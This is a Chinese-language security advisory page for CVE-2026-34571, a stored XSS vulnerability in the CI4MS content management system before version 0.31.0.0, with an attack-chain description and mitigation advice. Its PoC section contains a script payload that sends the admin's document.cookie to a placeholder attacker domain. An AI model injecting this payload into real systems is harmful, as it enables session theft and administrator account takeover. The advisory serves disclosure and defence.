CVE-2026-34571 CVSS 9.9 严重

CVE-2026-34571: CI4MS 存储型XSS漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34571

漏洞类型

存储型XSS

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CI4MS

漏洞概述

CI4MS是基于CodeIgniter 4的CMS系统，其在0.31.0.0之前的版本中存在严重的存储型XSS漏洞。由于后端用户管理功能未对用户输入进行适当的清理，攻击者可注入恶意JavaScript代码。一旦管理员访问受影响页面，恶意代码将自动执行，导致会话劫持、权限提升及管理员账户完全沦陷。

技术细节

该漏洞源于CI4MS后端用户管理模块对用户输入数据的过滤机制缺失。攻击者无需高权限即可利用此漏洞，通过在用户资料或管理字段中插入经过精心构造的恶意脚本（如`<script>`标签或事件处理器），由于应用程序缺乏输出编码，这些载荷会被持久化存储在数据库中。当具有管理员权限的用户访问受感染的用户管理页面时，浏览器会解析并执行这些恶意脚本。攻击者可借此窃取管理员的Session Cookie，从而绕过身份验证，接管管理员账户，执行任意管理操作，甚至进一步控制服务器。

攻击链分析

STEP 1

1. 获取访问权限

攻击者通过注册或利用现有低权限账户登录CI4MS系统。

STEP 2

2. 注入恶意载荷

攻击者在后端用户管理相关功能（如个人资料编辑）中输入包含JavaScript代码的恶意数据。

STEP 3

3. 载荷存储

系统后端未对数据进行有效过滤，直接将恶意脚本存储至数据库。

STEP 4

4. 触发执行

当管理员或高权限用户查看包含该数据的后台页面时，恶意脚本在浏览器端被渲染执行。

STEP 5

5. 完成攻击

攻击者利用执行的脚本窃取Session信息，进而接管管理员账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Simple PoC for Stored XSS in User Management -->
<!-- Inject this payload into a vulnerable field (e.g., Username or Description) -->
<script>
  // Example: Steal session cookie and send to attacker server
  var img = new Image();
  img.src = "http://attacker-controlled-domain.com/steal?cookie=" + encodeURIComponent(document.cookie);
</script>

影响范围

CI4MS < 0.31.0.0

防御指南

临时缓解措施

若无法立即升级，建议暂时限制对用户管理页面的访问权限，仅允许受信任的IP访问，并对管理员账户实施多因素认证（MFA）以降低被劫持后的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表